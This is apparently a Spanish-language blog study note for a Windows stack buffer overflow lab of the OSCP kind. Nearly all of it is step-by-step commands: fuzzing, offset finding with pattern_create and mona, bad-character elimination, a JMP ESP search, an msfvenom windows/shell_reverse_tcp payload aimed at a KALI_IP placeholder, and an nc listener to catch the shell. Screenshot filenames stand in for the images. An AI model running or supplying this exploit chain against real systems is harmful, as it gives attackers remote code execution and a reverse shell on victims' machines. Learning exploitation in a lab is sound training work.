python fuzzer.py

Pasted image 20210618081757.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 2200 o se puede usar esto msf-pattern_create -l 2200

Pasted image 20210618081922.png

Reiniciar app python3 exploit.py

!mona findmsp -distance 2200

Pasted image 20210618082100.png

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"

Reiniciar app

!mona bytearray -b "\x00"

chequear que bytearray.bin este generado en el folder de mona Reiniciar app

python3 bad_characters.py

Pasted image 20210616112718.png

Reiniciar app Pegar el output a payload python3 exploit.py

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Pasted image 20210618082722.png

escribimos los bad chars 00 1d 1e 2e 2f c7 c8 ee ef

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618082923.png

Le quitamos el x1d del payload hasta llegar al ultimo bad_char

Pasted image 20210618083010.png

Ahora el bad char es: 2e 2f c7 c8 ee ef \x00\x1d

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618083147.png

Le quitamos el x2e del payload hasta llegar al ultimo bad_char

Pasted image 20210618083427.png

Ahora el bad char es: c7 c8 ee ef \x00\x1d\x2e

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618083637.png

Le quitamos el xc7 del payload hasta llegar al ultimo bad_char

Pasted image 20210618083659.png

Ahora el bad char es: ee ef \x00\x1d\x2e\xc7

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618083848.png

Le quitamos el xee del payload hasta llegar al ultimo bad_char

Pasted image 20210618084018.png

Ahora el bad char es: ee ef \x00\x1d\x2e\xc7\xee

!mona jmp -r esp -cpb "\x00\x1d\x2e\xc7\xee"

Pasted image 20210618084319.png

Vamos a Window->Log Agarramos el numero # y despues lo escribos alreves por ejemplo 625011af seria \xaf\x11\x50\x62

Pasted image 20210618084737.png

cambiamos el rtn y iniciamos payload='' esto en exploit.py

msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x1d\x2e\xc7\xee" -f c

padding = "\x90" * 16

nc -lvnp 4444

blog

copyright©2022 Cu3rv0x all rights reserved